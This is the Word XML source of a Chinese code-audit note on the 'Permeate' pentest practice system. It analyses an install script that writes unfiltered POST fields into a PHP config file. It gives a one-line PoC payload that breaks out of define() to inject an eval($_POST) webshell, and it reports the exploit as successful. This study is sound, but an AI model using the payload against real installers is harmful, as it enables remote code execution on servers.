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color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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D7D31" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2017年7月11日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="3780" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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D7D31" w:themeColor="accent2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-----代码审计笔记</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="9DC3E6" w:themeColor="accent1" w:themeTint="99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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="9DC3E6" w:themeColor="accent1" w:themeTint="99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Permeate渗透测试系统 审计记录:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto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D7D31" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>安装GetShell漏洞:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFC000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color w:val="FFC000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Step3.php分析:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF000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FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//仅给出部分关键代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">$link =@mysql_connect($_POST['DB_HOST'], $_POST['DB_USER'], </w:t>
      </w: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>$_POST['DB_PASS']);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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>if (!$link) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">        echo "&lt;script&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">        echo "alert('数据库信息有误');";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">        echo "window.history.back();";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">        echo "&lt;/script&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C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0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里获取POST传入的 数据库地址 用户名 And 密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C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0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里是可以调用远程数据库或者是禁用Js达到绕过的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$conf = "&lt;?php\n";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>foreach ($_POST as $key =&gt; $val) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>if ($key != 'username' &amp;&amp; $key != 'password') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$conf .= "\t!defined('{$key}') &amp;&amp; define('$key','$val');\n";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    $a = "\$sex=array('保密','男','女');\n\$edu=array('保密','小学','初中','高中/中专','大专','本科','</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>研究生','博士','博士后');\n\$admins=array('普通用户','管理员')\n?&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    $conf = $conf . $a;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo $conf;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (file_put_contents("../conf/dbconfig.php", $conf)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">以上代码是获取Post的全部数据 用foreach循环来写入到dbconfig.php这个文件里的 这样 我们可以来先看一下正常的文件是什么样的 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="1" name="图片 1" descr="TIM图片20170711150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TIM图片2017071115020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40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0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是这样的 如果我们截断了后面的常量定义 岂不是可以直接写Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>废话不多说 开始构造PayLoad (PayLoad为Post发送的数据)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞地址:http://网站地址/install/step3.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PayLoad:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DB_HOST=localhost&amp;DB_USER=root&amp;DB_PASS=root&amp;&amp;aaa=;');e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>val ($_POST['aaa']);//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="FF0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  <w:t>验证:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(图片建议放大食用)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3535045" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="2" name="图片 2" descr="TIM图片201707111507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TIM图片2017071115075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35045" cy="231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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="7F6000" w:themeColor="accent4" w:themeShade="8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F6000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现在的dbconfig.php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="7F6000" w:themeColor="accent4" w:themeShade="8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F6000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="3" name="图片 3" descr="TIM图片201707111509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TIM图片2017071115093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17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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1925955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="17145"/>
            <wp:docPr id="4" name="图片 4" descr="TIM图片20170711151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TIM图片201707111510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25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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5377815" cy="2003425"/>
            <wp:effectExtent l="0" t="0" r="13335" b="15875"/>
            <wp:docPr id="5" name="图片 5" descr="TIM图片20170711151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TIM图片2017071115113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77815" cy="200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Theme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C55A11" w:themeColor="accent2" w:themeShade="BF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C55A11" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C55A11" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00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C00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Poc:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00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C00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="6" name="图片 6" descr="TIM图片20170711181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TIM图片2017071118190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411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Theme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00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C00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下载地址:http://pan.baidu.com/s/1pLnwRO3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dobe 仿宋 Std R">
    <w:panose1 w:val="02020400000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="0A0F1810" w:usb2="00000016" w:usb3="00000000" w:csb0="000600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092ABE"/>
    <w:rsid w:val="723A3B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2017-07-11T10:20:00Z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